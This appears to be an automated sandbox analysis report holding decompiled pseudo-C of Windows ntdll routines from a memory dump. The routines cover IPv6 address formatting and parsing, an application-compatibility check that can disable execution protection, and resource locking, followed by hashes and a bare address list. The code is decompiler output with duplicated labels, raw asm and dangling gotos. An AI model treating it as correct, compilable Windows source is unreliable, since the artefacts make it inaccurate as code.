                    				intOrPtr _t108;
                    				signed int _t114;
                    				void* _t115;
                    				intOrPtr _t128;
                    				intOrPtr* _t129;
                    				void* _t130;
                    
                    				_t129 = _a4;
                    				_t128 = _a8;
                    				_t116 = 0;
                    				_t71 = _t128 + 0x5c;
                    				_v8 = 8;
                    				_v20 = _t71;
                    				if( *_t129 == 0) {
                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                    						goto L5;
                    					} else {
                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                    						if(_t96 != 0) {
                    							L38:
                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                    								goto L5;
                    							} else {
                    								_push( *(_t129 + 0xf) & 0x000000ff);
                    								_push( *(_t129 + 0xe) & 0x000000ff);
                    								_push( *(_t129 + 0xd) & 0x000000ff);
                    								_t86 = E020E7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                    								L36:
                    								return _t128 + _t86 * 2;
                    							}
                    						}
                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                    						if(_t114 == 0) {
                    							L33:
                    							_t115 = 0x20b2926;
                    							L35:
                    							_push( *(_t129 + 0xf) & 0x000000ff);
                    							_push( *(_t129 + 0xe) & 0x000000ff);
                    							_push( *(_t129 + 0xd) & 0x000000ff);
                    							_push( *(_t129 + 0xc) & 0x000000ff);
                    							_t86 = E020E7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                    							goto L36;
                    						}
                    						if(_t114 != 0xffff) {
                    							_t116 = 0;
                    							goto L38;
                    						}
                    						if(_t114 != 0) {
                    							_t115 = 0x20b9cac;
                    							goto L35;
                    						}
                    						goto L33;
                    					}
                    				} else {
                    					L5:
                    					_a8 = _t116;
                    					_a4 = _t116;
                    					_v12 = _t116;
                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                    						if( *(_t129 + 0xa) == 0xfe5e) {
                    							_v8 = 6;
                    						}
                    					}
                    					_t90 = _v8;
                    					if(_t90 <= _t116) {
                    						L11:
                    						if(_a8 - _a4 <= 1) {
                    							_a8 = _t116;
                    							_a4 = _t116;
                    						}
                    						_t91 = 0;
                    						if(_v8 <= _t116) {
                    							L22:
                    							if(_v8 < 8) {
                    								_push( *(_t129 + 0xf) & 0x000000ff);
                    								_push( *(_t129 + 0xe) & 0x000000ff);
                    								_push( *(_t129 + 0xd) & 0x000000ff);
                    								_t128 = _t128 + E020E7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                    							}
                    							return _t128;
                    						} else {
                    							L14:
                    							L14:
                    							if(_a4 > _t91 || _t91 >= _a8) {
                    								if(_t91 != _t116 && _t91 != _a8) {
                    									_push(":");
                    									_push(_t71 - _t128 >> 1);
                    									_push(_t128);
                    									_t128 = _t128 + E020E7707() * 2;
                    									_t71 = _v20;
                    									_t130 = _t130 + 0xc;
                    								}
                    								_t78 = E020E7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                    								_t130 = _t130 + 0x10;
                    							} else {
                    								_push(L"::");
                    								_push(_t71 - _t128 >> 1);
                    								_push(_t128);
                    								_t78 = E020E7707();
                    								_t130 = _t130 + 0xc;
                    								_t91 = _a8 - 1;
                    							}
                    							_t91 = _t91 + 1;
                    							_t128 = _t128 + _t78 * 2;
                    							_t71 = _v20;
                    							if(_t91 >= _v8) {
                    								goto L22;
                    							}
                    							_t116 = 0;
                    							goto L14;
                    						}
                    					} else {
                    						_t108 = 1;
                    						_v16 = _t129;
                    						_v24 = _t90;
                    						do {
                    							if( *_v16 == _t116) {
                    								if(_t108 - _v12 > _a8 - _a4) {
                    									_a4 = _v12;
                    									_a8 = _t108;
                    								}
                    								_t116 = 0;
                    							} else {
                    								_v12 = _t108;
                    							}
                    							_v16 = _v16 + 2;
                    							_t108 = _t108 + 1;
                    							_t26 =  &_v24;
                    							 *_t26 = _v24 - 1;
                    						} while ( *_t26 != 0);
                    						goto L11;
                    					}
                    				}
                    			}



                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                    • API String ID: 48624451-2108815105
                    • Opcode ID: b8f5ab116968ede462a0007400573b9047fc11356d1e75fecad49d58ddd4233f
                    • Instruction ID: c1a6b597a33180271ea0272841204055d2878db5b809f9756e78bb10c450640b
                    • Opcode Fuzzy Hash: b8f5ab116968ede462a0007400573b9047fc11356d1e75fecad49d58ddd4233f
                    • Instruction Fuzzy Hash: 4D61E371D40759EADF65CF99C8909BEBBF5EF94300B14C12DEA9A46940D334A640EB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E020E7EFD(void* __ecx, intOrPtr _a4) {
                    				signed int _v8;
                    				char _v540;
                    				unsigned int _v544;
                    				signed int _v548;
                    				intOrPtr _v552;
                    				char _v556;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t33;
                    				void* _t38;
                    				unsigned int _t46;
                    				unsigned int _t47;
                    				unsigned int _t52;
                    				intOrPtr _t56;
                    				unsigned int _t62;
                    				void* _t69;
                    				void* _t70;
                    				intOrPtr _t72;
                    				signed int _t73;
                    				void* _t74;
                    				void* _t75;
                    				void* _t76;
                    				void* _t77;
                    
                    				_t33 =  *0x2192088; // 0x777117bf
                    				_v8 = _t33 ^ _t73;
                    				_v548 = _v548 & 0x00000000;
                    				_t72 = _a4;
                    				if(E020E7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                    					__eflags = _v548;
                    					if(_v548 == 0) {
                    						goto L1;
                    					}
                    					_t62 = _t72 + 0x24;
                    					E02103F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                    					_t71 = 0x214;
                    					_v544 = 0x214;
                    					E020BDFC0( &_v540, 0, 0x214);
                    					_t75 = _t74 + 0x20;
                    					_t46 =  *0x2194218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                    					__eflags = _t46;
                    					if(_t46 == 0) {
                    						goto L1;
                    					}
                    					_t47 = _v544;
                    					__eflags = _t47;
                    					if(_t47 == 0) {
                    						goto L1;
                    					}
                    					__eflags = _t47 - 0x214;
                    					if(_t47 >= 0x214) {
                    						goto L1;
                    					}
                    					_push(_t62);
                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                    					E02103F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                    					_t52 = E020C0D27( &_v540, L"Execute=1");
                    					_t76 = _t75 + 0x1c;
                    					_push(_t62);
                    					__eflags = _t52;
                    					if(_t52 == 0) {
                    						E02103F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                    						_t71 =  &_v540;
                    						_t56 = _t73 + _v544 - 0x218;
                    						_t77 = _t76 + 0x14;
                    						_v552 = _t56;
                    						__eflags = _t71 - _t56;
                    						if(_t71 >= _t56) {
                    							goto L1;
                    						} else {
                    							goto L10;
                    						}
                    						while(1) {
                    							L10:
                    							_t62 = E020C8375(_t71, 0x20);
                    							_pop(_t69);
                    							__eflags = _t62;
                    							if(__eflags != 0) {
                    								__eflags = 0;
                    								 *_t62 = 0;
                    							}
                    							E02103F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                    							_t77 = _t77 + 0x10;
                    							E0212E8DB(_t69, _t70, __eflags, _t72, _t71);
                    							__eflags = _t62;
                    							if(_t62 == 0) {
                    								goto L1;
                    							}
                    							_t31 = _t62 + 2; // 0x2
                    							_t71 = _t31;
                    							__eflags = _t71 - _v552;
                    							if(_t71 >= _v552) {
                    								goto L1;
                    							}
                    						}
                    					}
                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                    					_push(3);
                    					_push(0x55);
                    					E02103F92();
                    					_t38 = 1;
                    					L2:
                    					return E020BE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                    				}
                    				L1:
                    				_t38 = 0;
                    				goto L2;
                    			}



                    APIs
                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02103F12
                    Strings
                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0210E2FB
                    • Execute=1, xrefs: 02103F5E
                    • ExecuteOptions, xrefs: 02103F04
                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02103EC4
                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02103F75
                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02103F4A
                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0210E345
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: BaseDataModuleQuery
                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                    • API String ID: 3901378454-484625025
                    • Opcode ID: b6cd7998fb5ca2f2ae6b156b77f09d9031a58bc4864ba47e491ddb04d473273e
                    • Instruction ID: 2e74d764a87bf4877062ed67944a844692905875f6a54130b674b7ae56a885d9
                    • Opcode Fuzzy Hash: b6cd7998fb5ca2f2ae6b156b77f09d9031a58bc4864ba47e491ddb04d473273e
                    • Instruction Fuzzy Hash: 9141C871A8031C7EEF21DA94DCC5FDBB3BDAF14704F0005A9E516E6090EB70AA859F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E020F0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				void* _t108;
                    				void* _t116;
                    				char _t120;
                    				short _t121;
                    				void* _t128;
                    				intOrPtr* _t130;
                    				char _t132;
                    				short _t133;
                    				intOrPtr _t141;
                    				signed int _t156;
                    				signed int _t174;
                    				intOrPtr _t177;
                    				intOrPtr* _t179;
                    				intOrPtr _t180;
                    				void* _t183;
                    
                    				_t179 = _a4;
                    				_t141 =  *_t179;
                    				_v16 = 0;
                    				_v28 = 0;
                    				_v8 = 0;
                    				_v24 = 0;
                    				_v12 = 0;
                    				_v32 = 0;
                    				_v20 = 0;
                    				if(_t141 == 0) {
                    					L41:
                    					 *_a8 = _t179;
                    					_t180 = _v24;
                    					if(_t180 != 0) {
                    						if(_t180 != 3) {
                    							goto L6;
                    						}
                    						_v8 = _v8 + 1;
                    					}
                    					_t174 = _v32;
                    					if(_t174 == 0) {
                    						if(_v8 == 7) {
                    							goto L43;
                    						}
                    						goto L6;
                    					}
                    					L43:
                    					if(_v16 != 1) {
                    						if(_v16 != 2) {
                    							goto L6;
                    						}
                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                    						L47:
                    						if(_t174 != 0) {
                    							E020C8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                    							_t116 = 8;
                    							E020BDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                    						}
                    						return 0;
                    					}
                    					if(_t180 != 0) {
                    						if(_v12 > 3) {
                    							goto L6;
                    						}
                    						_t120 = E020F0CFA(_v28, 0, 0xa);
                    						_t183 = _t183 + 0xc;
                    						if(_t120 > 0xff) {
                    							goto L6;
                    						}
                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                    						goto L47;
                    					}
                    					if(_v12 > 4) {
                    						goto L6;
                    					}
                    					_t121 = E020F0CFA(_v28, _t180, 0x10);
                    					_t183 = _t183 + 0xc;
                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                    					goto L47;
                    				} else {
                    					while(1) {
                    						_t123 = _v16;
                    						if(_t123 == 0) {
                    							goto L7;
                    						}
                    						_t108 = _t123 - 1;
                    						if(_t108 != 0) {
                    							goto L1;
                    						}
                    						_t178 = _t141;
                    						if(E020F06BA(_t108, _t141) == 0 || _t135 == 0) {
                    							if(E020F06BA(_t135, _t178) == 0 || E020F0A5B(_t136, _t178) == 0) {
                    								if(_t141 != 0x3a) {
                    									if(_t141 == 0x2e) {
                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                    											goto L41;
                    										} else {
                    											_v24 = _v24 + 1;
                    											L27:
                    											_v16 = _v16 & 0x00000000;
                    											L28:
                    											if(_v28 == 0) {
                    												goto L20;
                    											}
                    											_t177 = _v24;
                    											if(_t177 != 0) {
                    												if(_v12 > 3) {
                    													L6:
                    													return 0xc000000d;
                    												}
                    												_t132 = E020F0CFA(_v28, 0, 0xa);
                    												_t183 = _t183 + 0xc;
                    												if(_t132 > 0xff) {
                    													goto L6;
                    												}
                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                    												goto L20;
                    											}
                    											if(_v12 > 4) {
                    												goto L6;
                    											}
                    											_t133 = E020F0CFA(_v28, 0, 0x10);
                    											_t183 = _t183 + 0xc;
                    											_v20 = _v20 + 1;
                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                    											goto L20;
                    										}
                    									}
                    									goto L41;
                    								}
                    								if(_v24 > 0 || _v8 > 6) {
                    									goto L41;
                    								} else {
                    									_t130 = _t179 + 1;
                    									if( *_t130 == _t141) {
                    										if(_v32 != 0) {
                    											goto L41;
                    										}
                    										_v32 = _v8 + 1;
                    										_t156 = 2;
                    										_v8 = _v8 + _t156;
                    										L34:
                    										_t179 = _t130;
                    										_v16 = _t156;
                    										goto L28;
                    									}
                    									_v8 = _v8 + 1;
                    									goto L27;
                    								}
                    							} else {
                    								_v12 = _v12 + 1;
                    								if(_v24 > 0) {
                    									goto L41;
                    								}
                    								_a7 = 1;
                    								goto L20;
                    							}
                    						} else {
                    							_v12 = _v12 + 1;
                    							L20:
                    							_t179 = _t179 + 1;
                    							_t141 =  *_t179;
                    							if(_t141 == 0) {
                    								goto L41;
                    							}
                    							continue;
                    						}
                    						L7:
                    						if(_t141 == 0x3a) {
                    							if(_v24 > 0 || _v8 > 0) {
                    								goto L41;
                    							} else {
                    								_t130 = _t179 + 1;
                    								if( *_t130 != _t141) {
                    									goto L41;
                    								}
                    								_v20 = _v20 + 1;
                    								_t156 = 2;
                    								_v32 = 1;
                    								_v8 = _t156;
                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                    								goto L34;
                    							}
                    						}
                    						L8:
                    						if(_v8 > 7) {
                    							goto L41;
                    						}
                    						_t142 = _t141;
                    						if(E020F06BA(_t123, _t141) == 0 || _t124 == 0) {
                    							if(E020F06BA(_t124, _t142) == 0 || E020F0A5B(_t125, _t142) == 0 || _v24 > 0) {
                    								goto L41;
                    							} else {
                    								_t128 = 1;
                    								_a7 = 1;
                    								_v28 = _t179;
                    								_v16 = 1;
                    								_v12 = 1;
                    								L39:
                    								if(_v16 == _t128) {
                    									goto L20;
                    								}
                    								goto L28;
                    							}
                    						} else {
                    							_a7 = 0;
                    							_v28 = _t179;
                    							_v16 = 1;
                    							_v12 = 1;
                    							goto L20;
                    						}
                    					}
                    				}
                    				L1:
                    				_t123 = _t108 == 1;
                    				if(_t108 == 1) {
                    					goto L8;
                    				}
                    				_t128 = 1;
                    				goto L39;
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: __fassign
                    • String ID: .$:$:
                    • API String ID: 3965848254-2308638275
                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                    • Instruction ID: c5d56884104f9ae7a5ac78f71af82edcdb178524a845c2e07e25239df6a88aee
                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                    • Instruction Fuzzy Hash: 34A1D371D8030ADFCFA5CF54C8447BEB7B7AF44308F24846ADA06A7A4AD7305645EB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E020F0554(signed int _a4, char _a8) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int* _t49;
                    				signed int _t51;
                    				signed int _t56;
                    				signed int _t58;
                    				signed int _t61;
                    				signed int _t63;
                    				void* _t66;
                    				intOrPtr _t67;
                    				void* _t69;
                    				signed int _t70;
                    				void* _t75;
                    				signed int _t81;
                    				signed int _t84;
                    				void* _t86;
                    				signed int _t93;
                    				signed int _t96;
                    				intOrPtr _t105;
                    				signed int _t107;
                    				void* _t110;
                    				signed int _t115;
                    				signed int* _t119;
                    				void* _t125;
                    				void* _t126;
                    				signed int _t128;
                    				signed int _t130;
                    				signed int _t138;
                    				signed int _t144;
                    				void* _t158;
                    				void* _t159;
                    				void* _t160;
                    
                    				_t96 = _a4;
                    				_t115 =  *(_t96 + 0x28);
                    				_push(_t138);
                    				if(_t115 < 0) {
                    					_t105 =  *[fs:0x18];
                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                    						goto L6;
                    					} else {
                    						__eflags = _t115 | 0xffffffff;
                    						asm("lock xadd [eax], edx");
                    						return 1;
                    					}
                    				} else {
                    					L6:
                    					_push(_t128);
                    					while(1) {
                    						L7:
                    						__eflags = _t115;
                    						if(_t115 >= 0) {
                    							break;
                    						}
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							__eflags = 0;
                    							return 0;
                    						} else {
                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                    							_t49 = _t96 + 0x1c;
                    							_t106 = 1;
                    							asm("lock xadd [edx], ecx");
                    							_t115 =  *(_t96 + 0x28);
                    							__eflags = _t115;
                    							if(_t115 < 0) {
                    								L23:
                    								_t130 = 0;
                    								__eflags = 0;
                    								while(1) {
                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                    									asm("sbb esi, esi");
                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021901c0;
                    									_push(_t144);
                    									_push(0);
                    									_t51 = E020AF8CC( *((intOrPtr*)(_t96 + 0x18)));
                    									__eflags = _t51 - 0x102;
                    									if(_t51 != 0x102) {
                    										break;
                    									}
                    									_t106 =  *(_t144 + 4);
                    									_t126 =  *_t144;
                    									_t86 = E020F4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                    									_push(_t126);
                    									_push(_t86);
                    									E02103F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                    									E02103F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                    									_t130 = _t130 + 1;
                    									_t160 = _t158 + 0x28;
                    									__eflags = _t130 - 2;
                    									if(__eflags > 0) {
                    										E0213217A(_t106, __eflags, _t96);
                    									}
                    									_push("RTL: Re-Waiting\n");
                    									_push(0);
                    									_push(0x65);
                    									E02103F92();
                    									_t158 = _t160 + 0xc;
                    								}
                    								__eflags = _t51;
                    								if(__eflags < 0) {
                    									_push(_t51);
                    									E020F3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                    									asm("int3");
                    									while(1) {
                    										L32:
                    										__eflags = _a8;
                    										if(_a8 == 0) {
                    											break;
                    										}
                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                    										_t119 = _t96 + 0x24;
                    										_t107 = 1;
                    										asm("lock xadd [eax], ecx");
                    										_t56 =  *(_t96 + 0x28);
                    										_a4 = _t56;
                    										__eflags = _t56;
                    										if(_t56 != 0) {
                    											L40:
                    											_t128 = 0;
                    											__eflags = 0;
                    											while(1) {
                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                    												asm("sbb esi, esi");
                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021901c0;
                    												_push(_t138);
                    												_push(0);
                    												_t58 = E020AF8CC( *((intOrPtr*)(_t96 + 0x20)));
                    												__eflags = _t58 - 0x102;
                    												if(_t58 != 0x102) {
                    													break;
                    												}
                    												_t107 =  *(_t138 + 4);
                    												_t125 =  *_t138;
                    												_t75 = E020F4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                    												_push(_t125);
                    												_push(_t75);
                    												E02103F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                    												E02103F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                    												_t128 = _t128 + 1;
                    												_t159 = _t158 + 0x28;
                    												__eflags = _t128 - 2;
                    												if(__eflags > 0) {
                    													E0213217A(_t107, __eflags, _t96);
                    												}
                    												_push("RTL: Re-Waiting\n");
                    												_push(0);
                    												_push(0x65);
                    												E02103F92();
                    												_t158 = _t159 + 0xc;
                    											}
                    											__eflags = _t58;
                    											if(__eflags < 0) {
                    												_push(_t58);
                    												E020F3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                    												asm("int3");
                    												_t61 =  *_t107;
                    												 *_t107 = 0;
                    												__eflags = _t61;
                    												if(_t61 == 0) {
                    													L1:
                    													_t63 = E020D5384(_t138 + 0x24);
                    													if(_t63 != 0) {
                    														goto L52;
                    													} else {
                    														goto L2;
                    													}
                    												} else {
                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                    													_push( &_a4);
                    													_push(_t61);
                    													_t70 = E020AF970( *((intOrPtr*)(_t138 + 0x18)));
                    													__eflags = _t70;
                    													if(__eflags >= 0) {
                    														goto L1;
                    													} else {
                    														_push(_t70);
                    														E020F3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                    														L52:
                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                    														_push( &_a4);
                    														_push(1);
                    														_t63 = E020AF970( *((intOrPtr*)(_t138 + 0x20)));
                    														__eflags = _t63;
                    														if(__eflags >= 0) {
                    															L2:
                    															return _t63;
                    														} else {
                    															_push(_t63);
                    															E020F3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                    															_push( &_a4);
                    															_push(1);
                    															_t63 = E020AF970( *((intOrPtr*)(_t138 + 0x20)));
                    															__eflags = _t63;
                    															if(__eflags >= 0) {
                    																goto L2;
                    															} else {
                    																_push(_t63);
                    																_t66 = E020F3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                    																asm("int3");
                    																while(1) {
                    																	_t110 = _t66;
                    																	__eflags = _t66 - 1;
                    																	if(_t66 != 1) {
                    																		break;
                    																	}
                    																	_t128 = _t128 | 0xffffffff;
                    																	_t66 = _t110;
                    																	asm("lock cmpxchg [ebx], edi");
                    																	__eflags = _t66 - _t110;
                    																	if(_t66 != _t110) {
                    																		continue;
                    																	} else {
                    																		_t67 =  *[fs:0x18];
                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                    																		return _t67;
                    																	}
                    																	goto L59;
                    																}
                    																E020D5329(_t110, _t138);
                    																_t69 = E020D53A5(_t138, 1);
                    																return _t69;
                    															}
                    														}
                    													}
                    												}
                    											} else {
                    												_t56 =  *(_t96 + 0x28);
                    												goto L3;
                    											}
                    										} else {
                    											_t107 =  *_t119;
                    											__eflags = _t107;
                    											if(__eflags > 0) {
                    												while(1) {
                    													_t81 = _t107;
                    													asm("lock cmpxchg [edi], esi");
                    													__eflags = _t81 - _t107;
                    													if(_t81 == _t107) {
                    														break;
                    													}
                    													_t107 = _t81;
                    													__eflags = _t81;
                    													if(_t81 > 0) {
                    														continue;
                    													}
                    													break;
                    												}
                    												_t56 = _a4;
                    												__eflags = _t107;
                    											}
                    											if(__eflags != 0) {
                    												while(1) {
                    													L3:
                    													__eflags = _t56;
                    													if(_t56 != 0) {
                    														goto L32;
                    													}
                    													_t107 = _t107 | 0xffffffff;
                    													_t56 = 0;
                    													asm("lock cmpxchg [edx], ecx");
                    													__eflags = 0;
                    													if(0 != 0) {
                    														continue;
                    													} else {
                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                    														return 1;
                    													}
                    													goto L59;
                    												}
                    												continue;
                    											} else {
                    												goto L40;
                    											}
                    										}
                    										goto L59;
                    									}
                    									__eflags = 0;
                    									return 0;
                    								} else {
                    									_t115 =  *(_t96 + 0x28);
                    									continue;
                    								}
                    							} else {
                    								_t106 =  *_t49;
                    								__eflags = _t106;
                    								if(__eflags > 0) {
                    									while(1) {
                    										_t93 = _t106;
                    										asm("lock cmpxchg [edi], esi");
                    										__eflags = _t93 - _t106;
                    										if(_t93 == _t106) {
                    											break;
                    										}
                    										_t106 = _t93;
                    										__eflags = _t93;
                    										if(_t93 > 0) {
                    											continue;
                    										}
                    										break;
                    									}
                    									__eflags = _t106;
                    								}
                    								if(__eflags != 0) {
                    									continue;
                    								} else {
                    									goto L23;
                    								}
                    							}
                    						}
                    						goto L59;
                    					}
                    					_t84 = _t115;
                    					asm("lock cmpxchg [esi], ecx");
                    					__eflags = _t84 - _t115;
                    					if(_t84 != _t115) {
                    						_t115 = _t84;
                    						goto L7;
                    					} else {
                    						return 1;
                    					}
                    				}
                    				L59:
                    			}

                    0x0211236a
                    0x0211236c
                    0x02112371
                    0x02112373
                    0x00000000
                    0x02112379
                    0x02112379
                    0x0211237a
                    0x0211237f
                    0x0211237f
                    0x02112385
                    0x02112386
                    0x02112389
                    0x0211238e
                    0x02112390
                    0x020d5378
                    0x020d537c
                    0x02112396
                    0x02112396
                    0x02112397
                    0x0211239c
                    0x021123a2
                    0x021123a3
                    0x021123a6
                    0x021123ab
                    0x021123ad
                    0x00000000
                    0x021123b3
                    0x021123b3
                    0x021123b4
                    0x021123b9
                    0x021123ba
                    0x021123ba
                    0x021123bc
                    0x021123bf
                    0x00000000
                    0x00000000
                    0x02109153
                    0x02109158
                    0x0210915a
                    0x0210915e
                    0x02109160
                    0x00000000
                    0x02109166
                    0x02109166
                    0x02109171
                    0x02109176
                    0x02109176
                    0x00000000
                    0x02109160
                    0x021123c6
                    0x021123ce
                    0x021123d7
                    0x021123d7
                    0x021123ad
                    0x02112390
                    0x02112373
                    0x0211233f
                    0x0211233f
                    0x00000000
                    0x0211233f
                    0x02112291
                    0x02112291
                    0x02112293
                    0x02112295
                    0x0211229a
                    0x021122a1
                    0x021122a3
                    0x021122a7
                    0x021122a9
                    0x00000000
                    0x00000000
                    0x021122ab
                    0x021122ad
                    0x021122af
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021122af
                    0x021122b1
                    0x021122b4
                    0x021122b4
                    0x021122b6
                    0x020d53be
                    0x020d53be
                    0x020d53be
                    0x020d53c0
                    0x00000000
                    0x00000000
                    0x020d53cb
